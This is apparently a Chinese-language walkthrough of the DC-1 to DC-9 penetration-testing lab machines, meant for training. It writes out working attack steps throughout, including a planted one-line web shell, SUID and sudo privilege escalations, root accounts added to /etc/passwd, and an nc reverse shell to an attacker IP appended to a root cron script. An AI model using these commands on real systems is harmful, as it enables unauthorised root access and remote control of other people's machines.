dc-1
使用Drupal的漏洞
use exploit/unix/webapp/drupal_drupalgeddon2
- 使用该模块成功获取shell,根据一系列提示知道最终的旗帜在root目录下,无权访问
find / -perm -u=s -type f 2>/dev/null
查看能以root身份执行的文件
列表结果显示有find命令
find / -exec “/bin/bash” -p ;
通过find与系统命令结合,进入root身份的shell控制台
dc-2
登录普通用户后,shell环境为rbash,限制使用cat,cd…命令,导致无法查看和切换文件
rbash:
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
通过以上命令可以进行绕过,得到相应旗帜根据获取的信息进行提权
sudo -l
查看当前用户下有无无需密码可执行root权限的命令
带有nopasswd的命令代表可以使用sudo但不需要密码即可获得root权限
sudo git help config
!/bin/bash
sudo执行git权限并进入shell交互环境,此时获得的shell环境为root身份
ch-3
通过Joomla 3.7.0版本sql注入漏洞得到数据库信息进入后台,网页管理模块下给index.php添加一句话木马,使用中国蚁剑连接获取shell,由于cms没有可以提权的漏洞,从系统内核入手
cat /etc/issue
uname -a
查看系统内核版本ubuntu16.04
searchsploit ubuntu 16.04
根据漏洞利用文件提示需要下载一个payload包,上传都dc靶机解压后,执行脚本成功提权
dc-4
- 在得到网站普通用户shell www-data用户下查看家目录文件
- 根据jim用户/home/jim/backups目录下的old-passwd文件成功爆破出此用户ssh登录密码
- 根据mbox文件提示进入/var/spool/mail查看一封来自root用户的信件,内容提供了charles的ssh密码
- 登录用户后
sudo -l
查看密码授权情况,发现teehee(小型文本编辑器)使用root权限执行无需密码
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
利用该漏洞创建无密码的root用户hack
[注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限
su hack
切换root用户hack成功提权
dc-5
由于dc5thankyou.php界面存在文件包含,通过nginx默认日志文件路径/var/log/nginx/access.log包含进行一句话木马连接
find / -perm -4000 2>/dev/null
- 查看root身份执行的文件
- screen-4.5.0存在于列表中,使用searchspolit命令查看该文件版本漏洞
- 根据脚本,分三步创建相应文件,成功提权
dc-6
wpscan --url wordy -e u
- 网站使用wordpress搭建,使用针对性的wpscan工具枚举用户名,并且根据官网提示获得密码文件
- bp爆破管理后台成功登录
- 漏扫探测后台Activity monitor插件存在漏洞,toos界面中可以查询ip命令
- bp抓包反弹获得普通shell
ls -alhR /home
命令查看home目录下所有文件
-a 显示所有文件
-l 除文件名外,列出文件权限,所有者,大小等详细信息列出
-h 将文件大小计算为kMG等单位,方便查看
-R 列出所有子目录
thing-do-to.txt中存在其他用户账户密码,ssh登录
sudo -l
jens用户可以无密码root执行backups.sh
修改backups.sh内容/bin/bash
echo 'os.execute("/bin/bash")' > root.nse
sudo -u jens /home/jens/backups.sh #使用jens用户执行脚本获得jens脚本shell
在jens用户中sudo -l 可发现nmap命令可以root用户执行
sudo nmap -script=root.nse
利用nmap刷脚本成功获得权限root
dc-7靶场
- 通过github得到的账号密码登录发现计划任务执行/opt/scripts/backups.sh
- 写入权限为root与www-data
- backups.sh内容涉及drush、gpg两个命令,dursh命令用于管理drupal站点的shell,利用其修改drupal默认管理员admin的密码从而进入后台
- 将反弹shell添加到content内容中
由于安全问题,phpfilter已经从drupal核心中移除,以模块形式存在,需要手动下载后
URL:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
- 到添加模块页面中选中激活,同时打开攻击机nc监听,添加内容获取www-data shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.133 LPORT=4444 R > DC7_shell.php
#创建反弹shell代码,将生成内容放到需要被添加的内容中
use exploit/multi/handler
# msf中监听反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.133 1234 >/tmp/f" >> backups.sh
- 登录www-data后有了编辑backups.sh文件权限
- 将反弹shell代码加入到backups.sh
- 因为该文件是被计划任务执行的,而执行计划人的权限是root
- 当该文件在计划任务中被执行时,得到反弹shell,提权成功
dc-8
find / -perm -4000 2>/dev/null #查看root权限执行的命令
- exim 4.89版本通过
searchsploit exim4寻找漏洞
/usr/share/exploitdb/exploits/linux/local/46996.sh
python -m http.server 8888 # 攻击机监听端口
vim 46996.sh
:set ff=unix #将文件类型修改为unix
:set ff=unix 告诉vi编辑器,使用unix换行符,因为有时候脚本文件在window系统下编辑好以后,放到linux系统下无法识别格式
- 将脚本文件上传到靶机,并赋予权限
./46996.sh -m netcat #靶机执行命令 提权成功
dc-9
- dc-9靶场存在有sql注入,通过SQLmap爆破获取到员工账号信息
- 此靶场运用到knockd服务
knockd用户防护ssh服务,通过按照配置的多个端口进行顺序访问(tcp/或其他请求),也叫做敲击端口,从而可以使ssh端口打开或关闭
- 查看
/etc/knockd.conf配置文件根据配置信息敲击相应端口后目标机22端口被打开 - 利用hydra工具并使用sqlmap爆出的账户密码数据进行22端口爆破
- 使用爆破成功的账户密码远程登录后,隐藏文件
.secrets-for-putin中存放的密码数据放入密码字典继续爆破 - fredf用户中
sudo -l查看nopasswd可以使用root权限执行的文件
find / -name test.py 2>/dev/null
2>/dev/null 代表忽略掉错误提示信息。
文件作用是接受参数1并追加到参数2文件中
openssl passwd -1 -salt hack 123456
- 使用工具生成一个加密密码
echo 'hack:$1$hack$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> ./passwd
# 用户名:密码:uid(0表示属主为root):gid(0表示属组为root):家目录:shell环境
sudo ./test passwd /etc/passwd #将内容追加到/etc/passwd文件中
su hack #切换hack(有用root权限)
成功登录并获取root权限
1492
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
